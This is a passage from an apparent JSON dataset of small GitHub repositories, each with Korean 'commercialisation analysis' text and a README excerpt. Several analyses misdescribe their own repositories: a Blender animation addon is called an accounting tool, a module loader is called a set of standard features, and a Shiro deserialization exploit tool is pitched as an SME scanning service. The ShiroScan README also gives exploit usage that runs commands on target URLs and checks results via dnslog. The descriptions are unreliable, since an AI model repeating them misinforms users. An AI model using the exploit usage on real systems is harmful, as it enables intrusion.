버전입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 금융 서비스**: 온라인 뱅킹, 결제 시스템, 암호화폐 거래소 등에서 고객 정보 보호를 강화할 때 사용\n2. **내부 업무 도구**: ","readme_excerpt":"What This Is\n============\n\n**This repository is now archived. We only tracked up through 3.1.7 and then, because\nit became too difficult as OpenSSL added more code to their implementation of\nQUIC, we moved to becoming a full fork of OpenSSL. We encourage you to see that\nrespository's [README](https://github.com/quictls/quictls/blob/main/README.md) If there\nfeatures you would like to see from more recent OpenSSL releases, please\n[report an issue](https://github.com/quictls/quictls/issues), or -- better yet :) --\nmake a [pull request](https://github.com/quictls/quictls/pulls).**\n\n**We encourage everyone to move to using the new QUICTLS project. If you support\nboth, we suggest you refer to this as `OldQuicTLS` and the new fork as `QuicTLS`**\n\nThis is a fork of [OpenSSL](https://www.openssl.org) to enable QUIC. In addition\nto the website, the official source distribution is at\n<https://github.com/openssl/openssl>. The OpenSSL `README` can be found at\n[README-OpenSSL.md](https://github.com/","composite_score":0.306,"license_safety_tag":"safe"},{"name":"entropic-dev/entropic","github_url":"https://github.com/entropic-dev/entropic","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":41,"description":"# Entropic 저장소 분석\n\n## 왜 보물인가\n자체 패키지 관리 시스템을 만들고자 하는 개발자들을 위한 새로운 대안 플랫폼으로, 기존 주류 시스템의 문제점을 개선하려는 혁신적 시도입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 개발팀이 구독하는 패키지 관리 서비스로 월정액 모델 운영\n2. **내부 업무 도구**: 기업 개발","readme_excerpt":"# Entropic: a federated package registry for anything\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-23-orange.svg?style=flat-square)](#contributors) [![Code of Conduct](https://img.shields.io/badge/%E2%9D%A4-code%20of%20conduct-blue.svg?style=flat-square)](./.github/CODE_OF_CONDUCT.md)\n\nA new package registry with a new CLI, designed to be easy to stand up inside your network. Entropic features an entirely new file-centric API and a content-addressable storage system that attempts to minimize the amount of data you must retrieve over a network. This file-centric approach also applies to the publication API. See the [API section of the manifesto](https://github.com/entropic-dev/entropic/tree/master/docs#apis) for more details about the API offered.\n\nEntropic assumes many registries co-existing and interoperating as a part of your normal workflow. All Entropic packages are namespaced, and a full Entropic package spec also includes the hostname of its registry.\n\nThe ","composite_score":0.306,"license_safety_tag":"safe"},{"name":"standard-things/esm","github_url":"https://github.com/standard-things/esm","stars":8,"language":"JavaScript","license":"NOASSERTION","abandonment_months":26,"description":"# standard-things/esm 분석\n\n## 왜 보물인가\n웹 개발에서 자주 사용되는 표준 기능들을 재사용 가능한 형태로 정리해놓아, 개발자들이 매번 같은 코드를 반복 작성하지 않도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n저코드(Low-code) 개발 플랫폼에서 개발자가 자주 필요로 하는 기본 기능들을 빠르게 ","readme_excerpt":"# esm\n\nThe brilliantly simple, babel-less, bundle-less ECMAScript module loader.\n\n> `esm` is the world’s most advanced ECMAScript module loader.\nThis fast, production ready, zero dependency loader is all you need to support\nECMAScript modules in Node 6+. See the release [post](https://medium.com/web-on-the-edge/tomorrows-es-modules-today-c53d29ac448c)\nand [video](https://www.youtube.com/watch?v=JcZ-FzfDq8A#t=5) for details!\n\nInstall\n---\n\n* __New projects__\n\n  Run `npm init esm` or `yarn create esm`.\n\n  :bulb: Use the `-y` flag to answer “yes” to all prompts.\n\n* __Existing projects__\n\n  Run `npm i esm` or `yarn add esm`.\n\nGetting started\n---\n\nThere are two ways to enable `esm`.\n\n1. Enable `esm` for packages:\n\n   Use `esm` to load the main ES module and export it as CommonJS.\n\n    __index.js__\n    ```js\n    // Set options as a parameter, environment variable, or rc file.\n    require = require(\"esm\")(module/*, options*/)\n    module.exports = require(\"./main.js\")\n    ```\n    __main.js__\n  ","composite_score":0.3059,"license_safety_tag":"unknown"},{"name":"ApolloZhu/Developing-iOS-11-Apps-with-Swift","github_url":"https://github.com/ApolloZhu/Developing-iOS-11-Apps-with-Swift","stars":5,"language":"Swift","license":"NOASSERTION","abandonment_months":73,"description":"# ApolloZhu/Developing-iOS-11-Apps-with-Swift 분석\n\n## 왜 보물인가\n아이폰 앱을 만드는 방법을 배울 수 있는 실제 강의 자료와 코드 예제 모음으로, 누구나 앱 개발의 기초를 이해할 수 있도록 정리되어 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 온라인 강의 사이트에서 초급자용 iOS 개발 강좌로 패","readme_excerpt":"# Developing iOS 11 Apps with Swift 字幕简体中文翻译项目\n\n如果您想支持我们，请点击项目右上角的 <a class=\"github-button\" href=\"https://github.com/Apollonyan/Developing-iOS-11-Apps-with-Swift\" data-icon=\"octicon-star\" data-show-count=\"true\" aria-label=\"Star Apollonyan/Developing-iOS-11-Apps-with-Swift on GitHub\">Star</a> 按钮来 Star 本项目。\n\n如果您感兴趣，有能力，我们欢迎您参与翻译/校对本项目。详情见 [任务相关说明](https://github.com/Apollonyan/Developing-iOS-11-Apps-with-Swift/blob/master/CONTRIBUTING.md)。\n\n- 翻译进度： ![5集](http://progressed.io/bar/5?scale=20&suffix=%E9%9B%86)\n- 校对进度： ![2集](http://progressed.io/bar/3?scale=20&suffix=%E9%9B%86)\n- 课程录像： [bilibili](https://www.bilibili.com/video/av16339375/)。字幕会在每集 **校对后** 以 Close Caption 上传\n- 从 iTunes U 提取： [下载列表](./tools/update/download.md)（因 iTunes 机制变更，暂时不能访问）\n\n其它问题请参见本文档剩下的部分或 [常见问题与解答](./SUPPORT.md)。\n\n#### 字幕下载\n\n[`subtitles`](./subtitles) 文件夹中是中英字幕（不一定都翻译了），[`en/subtitles`](./en/subtitles) 文件夹中是纯英文字幕。您可以通过 [下载整个项目](https://github.com/Apollonyan/Developing-iOS-11-Apps-with-Swift/archive/master.zip) 来获取这些字","composite_score":0.3059,"license_safety_tag":"unknown"},{"name":"raphamorim/react-tv","github_url":"https://github.com/raphamorim/react-tv","stars":5,"language":"JavaScript","license":"mit","abandonment_months":51,"description":"# react-tv 프로젝트 평가\n\n## 왜 보물인가\nTV와 리모콘으로 조작하는 스마트 TV 앱을 쉽게 만들 수 있는 도구로, 스마트 TV 시장 성장에 따른 미충족 수요를 겨냥하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트 TV 앱 개발 플랫폼**: 방송국이나 OTT 서비스 회사가 자체 TV 앱을 빠르게 개발할 때 사용\n2. **기업용 디지털 사","readme_excerpt":"# [React-TV](https://github.com/raphamorim/react-tv) · [![license](https://img.shields.io/npm/l/react-tv.svg)]() [![npm version](https://img.shields.io/npm/v/react-tv.svg?style=flat)](https://www.npmjs.com/package/react-tv) [![circleci status](https://circleci.com/gh/raphamorim/react-tv/tree/master.svg?style=shield)](https://circleci.com/gh/raphamorim/react-tv) [![Build status](https://ci.appveyor.com/api/projects/status/a9uh7sdg2njyojjd/branch/master?svg=true)](https://ci.appveyor.com/project/raphamorim/react-tv/branch/master) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](CONTRIBUTING.md#pull-requests)\n\n> <p>react-tv: React Renderer for low memory applications.</p><p>react-tv-cli: React Packager for TVs.</p><p>Currently under development.</p>\n\n![React-TV Logo](resources/images/reactv-cover-dark.png)\n\n```jsx\nimport React from 'react'\nimport ReactTV, { Platform } from 'react-tv'\n\nclass Clock extends React.Component {\n  state = { date: new Date() }\n\n  compone","composite_score":0.3059,"license_safety_tag":"safe"},{"name":"jupyter4edu/jupyter-edu-book","github_url":"https://github.com/jupyter4edu/jupyter-edu-book","stars":18,"language":"TeX","license":"CC-BY-4.0","abandonment_months":38,"description":"# jupyter4edu/jupyter-edu-book 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 따라 할 수 있는 인터랙티브 교육 콘텐츠를 만드는 방법을 담은 완성된 가이드북으로, 온라인 교육 시장의 증가하는 수요에 직접 대응할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 SaaS**: 학교/학원이 직접 인터랙티브 강의자료를 ","readme_excerpt":"# Teaching and Learning with Jupyter\n\n[![Build Status](https://travis-ci.com/jupyter4edu/jupyter-edu-book.svg?branch=master)](https://travis-ci.com/jupyter4edu/jupyter-edu-book)\n\nAn open book about Jupyter and its use in teaching and learning.\n\nThis repository is the source materials for the book \"Teaching and Learning with Jupyter.\" It can be found here: \nhttps://jupyter4edu.github.io/jupyter-edu-book/\n\nTo view the book as HTML, and download it as PDF and other formats, please visit:\nhttps://jupyter4edu.github.io/jupyter-edu-book/\n\nIf you would like to contribute to this book, please see the file [CONTRIBUTING.md](CONTRIBUTING.md).\n\n\n## Code of Conduct\n\nPlease note that this project is released with a Contributor Code of Conduct\nbased on the [Contributor Covenant](http://contributor-covenant.org) code of conduct.\nThe full code of conduct is available in the\n[CODE_OF_CONDUCT.md](CODE-OF-CONDUCT.md)\nfile. By participating in this project you agree to abide by its terms.\n","composite_score":0.3058,"license_safety_tag":"unknown"},{"name":"qq20004604/webpack-study","github_url":"https://github.com/qq20004604/webpack-study","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":88,"description":"# webpack-study 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 여러 파일들을 효율적으로 정리해주는 도구의 학습 자료로, 초급자도 접근할 수 있는 실용적인 예제 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 SaaS**: 비전공자 대상 온라인 강의 플랫폼에서 실습 자료로 판매\n2. **회사 신입교육 도구**: IT 회","readme_excerpt":"程序员技术交流、面试、职场、生活、游戏、相亲，综合讨论QQ群：387017550，群内经常发红包，欢迎加入\n\n核心竞争力：每周一次免费面试，在YY频道直播，可旁听，有往期录音\n\n<h3>0、前注</h3>\n\n本文内容源于[webpack中文文档](https://doc.webpack-china.org/concepts/)，以及我自己实践中写的若干DEMO。\n\n每个DEMO以文件夹为单位，从入门到进阶，根据文件夹编号为准，逐步递进。\n\n成文时，webpack版本是【3.8.1】\n\n交流QQ群：387017550\n\n<h3>0.1、安装webpack</h3>\n\n首先你需要安装Node.js，[点击打开Node.js下载页面](https://nodejs.org/zh-cn/download/)。安装完Node.js后，会自带npm包管理器。\n\n>npm install webpack -g\n\n这个命令将安装最新版本的webpack（全局，学习教程中推荐，避免多次安装。但实践中还是有必要一个项目一个webpack，避免版本冲突带来的bug）\n\n目前版本是3.8.1（2017/11/27）\n\n>webpack -v\n\n查看当前webpack版本\n\n<b>执行命令：</b>\n\n以下执行webpack命令时，指在对应文件夹下，通过控制台执行命令。\n\n<b>快速抵达对应目录的控制台（win）：</b>\n\n在对应目录下，按住 ``shift``，然后点击鼠标右键，在弹窗里选择``在此处打开命令窗口``即可启用\n\n<b>MAC 快速打开某个目录的终端：</b>\n\n参考[这个链接](https://blog.phpgao.com/open_terminal_in_finder.html)\n\n<h3>0.2、命令执行</h3>\n\n>安装（fork项目后，第一次运行每个项目之前，都需要执行一遍）\n\n```\nnpm install\n```\n\n> 执行（不同项目，执行的命令可能不同，参照每个项目的文档，或者 package.json 里的 scripts 里的值）\n\n```\n// 一般使用（没有特殊要求，表示这个只是为了熟悉功能）\nnpm run test\n\n// 开发环境使用（从 7、HMR 一节开始添加，）\nnpm run dev\n\n// 生产环境使用（一般用于实战项目，或该项目","composite_score":0.3058,"license_safety_tag":"unknown"},{"name":"BugScanTeam/hackhttp","github_url":"https://github.com/BugScanTeam/hackhttp","stars":5,"language":"Python","license":"unknown","abandonment_months":121,"description":"# BugScanTeam/hackhttp 분석\n\n## 왜 보물인가\n웹사이트 보안 문제를 자동으로 찾아내는 도구로, 기업의 사이버 공격 방어 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업용 웹사이트 보안 진단 플랫폼으로 월 구독 방식 제공\n2. **내부 업무 도구**: 대기업 IT팀이 자사 웹사이트와 서비","readme_excerpt":"```\n _                _    _     _   _\n| |__   __ _  ___| | _| |__ | |_| |_ _ __\n| '_ \\ / _` |/ __| |/ / '_ \\| __| __| '_ \\\n| | | | (_| | (__|   <| | | | |_| |_| |_) |\n|_| |_|\\__,_|\\___|_|\\_\\_| |_|\\__|\\__| .__/\n                                    |_|\n```\n[![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/)  [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/bugscanteam/hackhttp/master/GPL-2.0)\n\n简介\n---\n\nhackhttp 是四叶草安全旗下 BugscanTeam 打造的一款 Python 语言的 HTTP 第三方库。是分布式漏洞扫描框架 BugScan 中核心库之一。\n\nhackhttp 致力于帮助安全测试人员快速编写代码，除众多基础功能外，hackhttp 支持直接发送 HTTP 原始报文，开发者可以直接将浏览器或者 Burp Suite 等抓包工具中截获的 HTTP 报文复制后，无需修改报文，可直接使用 hackhttp 进行重放。\n\nhackhttp 使用连接池技术，在应对大量请求时自动对连接进行复用，节省建立连接时间与服务器资源，这种天生的特性，在编写爬虫时尤为显著，测试用例中提供了一个爬取乌云所有漏洞的爬虫。\n\n安装\n---\n\n### 使用 pip 安装\n\n```\n$ pip install hackhttp\n```\n\n如果提示找不到源可以手动指定为官方源：\n\n```\n$ pip install -i https://pypi.python.org/pypi hackhttp\n```\n\n### 使用源码安装\n\n1. 获取源代码\n\n 你可以通过用 Git 来克隆代码仓库中的","composite_score":0.3058,"license_safety_tag":"unknown"},{"name":"ndee85/coa_tools","github_url":"https://github.com/ndee85/coa_tools","stars":6,"language":"Python","license":"gpl-3.0","abandonment_months":25,"description":"# coa_tools 저장소 분석\n\n## 왜 보물인가\n회계 및 재무 데이터를 자동으로 정리하고 분석할 수 있는 도구로, 중소기업의 반복적인 사무 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 세무사·회계사를 위한 클라우드 기반 회계 자동화 플랫폼으로 월 구독료 수익 창출\n2. **내부 업무 도구**: 기업의 재무팀","readme_excerpt":"<img src=\"./coa_tools_logo.png\" width=\"250\">\n\n# Cutout Animation Tools - Documentation\nThis is the Documentation for the Blender/Godot Addon Cutout Animation Tools.\n\nIf you like this addon and want to thank me with a small donation feel free to do this here:\n\n[![](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=8TB6CNT9G8LEN)\n\n## Description\nThe Cutout Animation Tools (COA Tools) Addon for blender is a 2D rigging and animation suite. It offers you similar tools as for example programs like Spine or Spriter. COA Tools offer you a rapid workflow to create 2D Cutout Character/Animations in blender. Thanks to blenders great animation system and and this addon you get a powerfull solution to create 2D animations. It is parted into 3 different components. Photoshop sprite exporter, Blender Addon, Godot importer.\n\n[Take a look at the addon in action.](https://www.youtube.com/playlist?list=PLPI26-KXCXpA-VMlDIW","composite_score":0.3058,"license_safety_tag":"restricted"},{"name":"jakubroztocil/rrule","github_url":"https://github.com/jakubroztocil/rrule","stars":7,"language":"TypeScript","license":"NOASSERTION","abandonment_months":23,"description":"# jakubroztocil/rrule 상용화 분석\n\n## 왜 보물인가\n반복되는 일정(매주 월요일, 매월 1일 등)을 자동으로 관리해주는 핵심 기술로, 캘린더·예약·구독 서비스 등 일정 관리가 필요한 모든 비즈니스에 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 캘린더/예약 SaaS**\n- 병원 예약, 미용실 예약, 컨설팅 부킹 플랫폼에서 \"매주 ","readme_excerpt":"# rrule.js\n\n**Library for working with recurrence rules for calendar dates.**\n\n[![NPM version][npm-image]][npm-url]\n[![Build Status][ci-image]][ci-url]\n[![js-standard-style][js-standard-image]][js-standard-url]\n[![Downloads][downloads-image]][downloads-url]\n[![Gitter][gitter-image]][gitter-url]\n[![codecov.io](http://codecov.io/github/jkbrzt/rrule/coverage.svg?branch=master)](http://codecov.io/github/jkbrzt/rrule?branch=master)\n\nrrule.js supports recurrence rules as defined in the [iCalendar\nRFC](https://tools.ietf.org/html/rfc5545), with a few important\n[differences](#differences-from-icalendar-rfc). It is a partial port of the\n`rrule` module from the excellent\n[python-dateutil](http://labix.org/python-dateutil/) library. On top of\nthat, it supports parsing and serialization of recurrence rules from and\nto natural language.\n\n---\n\n### Quick Start\n\n- [Demo app](http://jkbrzt.github.io/rrule/)\n- # For contributors and maintainers: the code for the demo app is only on `gh-pages` branch\n\n##","composite_score":0.3057,"license_safety_tag":"unknown"},{"name":"tomthecarrot/arcore-for-all","github_url":"https://github.com/tomthecarrot/arcore-for-all","stars":5,"language":"Java","license":"gpl-3.0","abandonment_months":49,"description":"# ARCore for All 평가 보고서\n\n## 왜 보물인가\n비싼 AR 기술을 누구나 쉽게 사용할 수 있도록 만든 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AR 기반 가상 시착 앱 (의류, 안경, 메이크업 미리보기)\n- **내부 업무 도구**: 건설 현장 설계도 AR 시뮬레이션, 부동산 가상 투어 제작 플랫폼\n- *","readme_excerpt":"# ARCore for All\nGoogle ARCore (dev preview 1) for \"unsupported\" Android devices\n\n## Summary\nGoogle's ARCore developer preview for Android is awesome. Unfortunately, my Android phone (Samsung GS8+) was not on the supported list, and apps built with ARCore exit at start on my device. However, its hardware actually can run ARCore!\n\nI modified the Android library to strip the ARCore device check, and ARCore started working on the device.\n\n## Developer Preview 2\nARCore has been updated to Preview 2 by Google. More devices are now supported. Another project on GitHub, [ARCore Patch](https://github.com/thestr4ng3r/arcore-patch), aims to extend unofficial device support for the new version.  \n\n## Developer Preview 1\nPlease see below for research on the first preview build.\n\n### See Experimental Branch\nThis branch is unlikely to work on most devices.  \n**Please check out the [service mod](https://github.com/tomthecarrot/arcore-for-all/tree/service-mod) branch** of this repo to help us develop ","composite_score":0.3057,"license_safety_tag":"restricted"},{"name":"xunleif2e/vue-lazy-component","github_url":"https://github.com/xunleif2e/vue-lazy-component","stars":5,"language":"Vue","license":"mit","abandonment_months":78,"description":"# vue-lazy-component 상용화 분석\n\n## 왜 보물인가\n웹사이트의 로딩 속도를 개선하는 기술로, 방문자가 실제로 보는 콘텐츠만 먼저 로드해서 페이지를 빠르게 띄울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이커머스 플랫폼**: 상품 이미지가 많은 쇼핑몰에서 페이지 로딩 속도를 2배 이상 개선\n2. **뉴스/미디어 서비스**: 기사 목록","readme_excerpt":"# Vue Lazy Component\n\n[![npm](https://img.shields.io/npm/v/@xunlei/vue-lazy-component.svg)](https://www.npmjs.com/package/@xunlei/vue-lazy-component)\n[![Commitizen friendly](https://img.shields.io/badge/commitizen-friendly-brightgreen.svg)](http://commitizen.github.io/cz-cli/)\n[![Git flow work flow](https://img.shields.io/badge/git--flow-workflow-brightgreen.svg)](https://github.com/nvie/gitflow/)\n[![GitHub stars](https://img.shields.io/github/stars/xunleif2e/vue-lazy-component.svg)](https://github.com/xunleif2e/vue-lazy-component/stargazers)\n[![GitHub issues](https://img.shields.io/github/issues/xunleif2e/vue-lazy-component.svg)](https://github.com/xunleif2e/vue-lazy-component/issues)\n[![GitHub forks](https://img.shields.io/github/forks/xunleif2e/vue-lazy-component.svg)](https://github.com/xunleif2e/vue-lazy-component/network)\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/xunleif2e/vue-lazy-component/master/LICENSE)\n\n> 🐌 Vue.j","composite_score":0.3057,"license_safety_tag":"safe"},{"name":"dbolya/yolact","github_url":"https://github.com/dbolya/yolact","stars":5,"language":"Python","license":"MIT","abandonment_months":9,"description":"# YOLACT 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 빠르게 찾아내고 경계선을 그려주는 기술로, 실시간 처리가 필요한 산업에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 카메라 SaaS**: CCTV 영상에서 침입자나 위험 물체를 자동 감지하고 알림 보내는 구독형 서비스\n2. **제조업 품질검사 도구**: 공장 라인","readme_excerpt":"# **Y**ou **O**nly **L**ook **A**t **C**oefficien**T**s\n```\n    ██╗   ██╗ ██████╗ ██╗      █████╗  ██████╗████████╗\n    ╚██╗ ██╔╝██╔═══██╗██║     ██╔══██╗██╔════╝╚══██╔══╝\n     ╚████╔╝ ██║   ██║██║     ███████║██║        ██║   \n      ╚██╔╝  ██║   ██║██║     ██╔══██║██║        ██║   \n       ██║   ╚██████╔╝███████╗██║  ██║╚██████╗   ██║   \n       ╚═╝    ╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝ \n```\n\nA simple, fully convolutional model for real-time instance segmentation. This is the code for our papers:\n - [YOLACT: Real-time Instance Segmentation](https://arxiv.org/abs/1904.02689)\n - [YOLACT++: Better Real-time Instance Segmentation](https://arxiv.org/abs/1912.06218)\n\n#### YOLACT++ (v1.2) released! ([Changelog](CHANGELOG.md))\nYOLACT++'s resnet50 model runs at 33.5 fps on a Titan Xp and achieves 34.1 mAP on COCO's `test-dev` (check out our journal paper [here](https://arxiv.org/abs/1912.06218)).\n\nIn order to use YOLACT++, make sure you compile the DCNv2 code. (See [Installation](https://git","composite_score":0.3057,"license_safety_tag":"safe"},{"name":"sv3nbeast/ShiroScan","github_url":"https://github.com/sv3nbeast/ShiroScan","stars":7,"language":"Python","license":"unknown","abandonment_months":64,"description":"# ShiroScan 사업화 분석\n\n## 왜 보물인가\n웹사이트의 보안 취약점을 자동으로 찾아주는 도구로, 중소 기업들이 비용 없이 보안 검사를 할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형으로 회사 웹사이트를 정기적으로 자동 스캔하고 취약점 리포트를 이메일로 발송\n2. **내부 업무 도구**: 웹 개발팀이 코드 ","readme_excerpt":"# ShiroScan\nShiro&lt;=1.2.4反序列化，一键检测工具\n\n    2021·1·15:\n    改动内容：1.删除CC8利用链\n    改动内容：2.新增xray总结的k1到k4这4个利用链\n    改动内容：3.新增Jdk8u20的利用链\n    改动内容：4.新增GCM加密发包\n    \n    过往:\n    改动内容：1.新增17个利用链模块,共28个利用链，预计增加成功率30%，已打包成新ysoserial的jar包，请勿更换\n    改动内容：2.可直接获得目标使用key值\n    改动内容：3.新增30个key(再多意义也不大)\n    改动内容：4.输入命令自动进行bash编码，防止未了解此漏洞的人踩坑,但要注意的是如果执行的命令为携带``符号，常用于dnslog外带命令，需自行传入bash编码，否则终端会自行将本地执行结果带入命令中\n\n```\n共集成51个key进行fuzz\n```\n![](./run.png)\n* 如果有帮助，请点个star哦， blog：https://www.svenbeast.com\n* pip3 install -r requirments.txt   \n* 若import模块错误，安装不成功，请到linux系统安装运行，或者去python库将crypto首字母改为大写并尝试pip install pycryptodome\")\n* 如果存在异常java信息，请使用jdk1.8环境运行，避免使用高版本java运行\n\n* Usage：python3 shiro.py  url  command\n* Usage：python3 shiro.py  http://url.com  whoami\n\n* http://www.dnslog.cn/   验证推荐使用这个dnslog平台，速度比ceye.io要快很多\n* 执行的命令带空格记得用\"\"引起来\n\n* usage：python3 shiro.py  http://url.com  \"ping dnslog.cn\"\n* 28个模块全部跑一遍,然后去dnslog平台查看是否收到请求，不出来就GG，也可能是因为目标使用的编码很冷门，可使用其他工具\n\n* 请自行收集编码，在moule下的key.log中自行添加即可(格式: key:任意值)\n\n## 本着尽可能的检测","composite_score":0.3057,"license_safety_tag":"unknown"},{"name":"google/svcca","github_url":"https://github.com/google/svcca","stars":6,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":55,"description":"# google/svcca 분석 보고서\n\n## 왜 보물인가\n두 개의 인공지능 모델이 같은 방식으로 생각하는지 비교하는 도구로, AI 모델 개발 과정에서 품질을 확인하는 데 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **AI 모델 검증 SaaS**: 기업들이 자신의 AI 모델을 업로드하면 품질을 자동으로 진단해주는 웹 서비스\n2. **대형 AI 회사 ","readme_excerpt":"\nDisclaimer: This is not an official Google product.\n\nCopyright 2018 Google Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttps://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\n## (SV)CCA for Representational Insights in Deep Neural Networks\n\nThis repository contains code and [jupyter notebook tutorials](https://github.com/google/svcca/tree/master/tutorials) on results in the following papers, as well as suggested extensions and open problems.\n1. [\"SVCCA: Singular Vector Canonical Correlation Analysis for Deep Learning Dynamics and Interpretability\"](https://arxiv.or","composite_score":0.3056,"license_safety_tag":"safe"},{"name":"android/kotlin-guides","github_url":"https://github.com/android/kotlin-guides","stars":11,"language":"HTML","license":"unknown","abandonment_months":93,"description":"# android/kotlin-guides 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 따라야 할 표준적인 작업 방식을 정리한 기록이라, 개발팀의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 모바일 앱을 만드는 회사들이 개발팀 온보딩 시간을 50% 단축하는 표준 가이드로 사용\n2. **개발 교","readme_excerpt":"Kotlin Guides\n=============\n\nMoved to https://developer.android.com/kotlin/!\n","composite_score":0.3056,"license_safety_tag":"unknown"},{"name":"poldrack/psych10-book","github_url":"https://github.com/poldrack/psych10-book","stars":13,"language":"TeX","license":"unknown","abandonment_months":75,"description":"# poldrack/psych10-book 분석\n\n## 왜 보물인가\n심리학 개론을 배우는 학생들을 위해 무료로 공개된 전자 교과서로, 교육 기관이 교육비 부담을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **대학 온라인 강의 플랫폼**: 심리학 입문 강좌를 운영하는 대학의 LMS(학습관리시스템)에 콘텐츠 통합 제공\n2. **교육용 SaaS**","readme_excerpt":"This project has moved to https://github.com/statsthinking21\n","composite_score":0.3055,"license_safety_tag":"unknown"},{"name":"oreillymedia/etudes-for-erlang","github_url":"https://github.com/oreillymedia/etudes-for-erlang","stars":49,"language":"Erlang","license":"unknown","abandonment_months":50,"description":"","readme_excerpt":"[preface]\r\n== Études for Erlang\r\n\r\nWelcome to _Études for Erlang_.  In this book, you will find descriptions of programs that you can write in Erlang. The programs will usually be short, and each one has been designed to provide practice material for a particular Erlang programming concept. These programs have not been designed to be of considerable difficulty, though they may ask you to stretch a bit beyond the immediate material and examples that you find in the book http://shop.oreilly.com/product/0636920025818.do[Introducing Erlang].\r\n\r\nThis book is open source, so if you'd like to contribute, make a correction, or otherwise participate in the project, check out https://github.com/oreillymedia/etudes-for-erlang[oreillymedia/etudes-for-erlang] on GitHub for details. If we accept your work, we'll add you to the contributors chapter.\r\n\r\nThe online version of the book is at http://chimera.labs.oreilly.com/books/1234000000726[Études for Erlang] on O'Reilly Labs.\r\n\r\n=== Contributor Guide","composite_score":0.3055,"license_safety_tag":"unknown"},{"name":"BuzzFeedNews/everything","github_url":"https://github.com/BuzzFeedNews/everything","stars":6,"language":"","license":"unknown","abandonment_months":50,"description":"# BuzzFeedNews/everything 분석\n\n## 왜 보물인가\nBuzzFeed의 공개 뉴스 데이터베이스로, 언론사가 직접 수집한 신뢰도 높은 정보를 누구나 자유롭게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **뉴스 분석 SaaS**: 언론사 데이터를 기반으로 트렌드 분석, 기사 자동분류 서비스 제공\n- **미디어 모니터링 도구**: 뉴스","readme_excerpt":"# BuzzFeedNews/everything\n\nAn index of all our open-source data, analysis, libraries, tools, and guides.\n\n## Table of Contents\n\n- [Data and Analyses](#data-and-analyses)\n- [Standalone Datasets](#standalone-datasets)\n- [Libraries and Tools](#libraries-and-tools)\n- [Guides](#guides)\n\n---\n\n## Data and Analyses\n\nDate|Description|Repo(s)|Article(s)\n----|-----------|:--:|:-----:\n`2022-04-27`|Data and analysis of state child abuse and neglect registries and appeals|[:link:](https://github.com/BuzzFeedNews/2022-04-registries)|[:link:](https://www.buzzfeednews.com/article/scottpham/child-abuse-and-neglect-registries-punish-parents-of-color)\n`2022-04-25`|Data and analysis of intermediate care facilities|[:link:](https://github.com/BuzzFeedNews/2022-04-icf-analysis)|[:link:](https://www.buzzfeednews.com/article/kendalltaggart/kkr-brightspring-disability-private-equity-abuse)\n`2021-09-17`|Data and analysis re. US adult guardianship filing counts|[:link:](https://github.com/BuzzFeedNews/2021-09-gua","composite_score":0.3054,"license_safety_tag":"unknown"},{"name":"iammert/AppLocker","github_url":"https://github.com/iammert/AppLocker","stars":44,"language":"Kotlin","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/iammert/AppLocker/master/art/cover.png\">\n</p>\n\nI decided to open source my side project SecureBox. I'm sure most of us are suffering in some android's APIs. This application already has some user on Play Store market. So this open source project provides you the working solution about specific API's. Below, you will find a list of technical things to learn from this project.\n[You can download app from Play Store](https://play.google.com/store/apps/details?id=com.momentolabs.app.security.applocker&hl=en)\n\n# App Features\n* App locker\n* Fingerprint Validation\n* Vault Image/Video file (File Encryption/Decryption)\n* Block call (Blacklist)\n* Private Browser\n* Take intruders photo secretly (Camera 1 API)\n\n# What can I learn\n* RxJava 2\n* Dagger 2\n* Room Database\n* ViewModel & LiveData\n* Work Manager\n* FingerPrint API\n* App Usage Stat Manager (Is any app comes to foreground/background)\n* Background & Foreground Services (covers 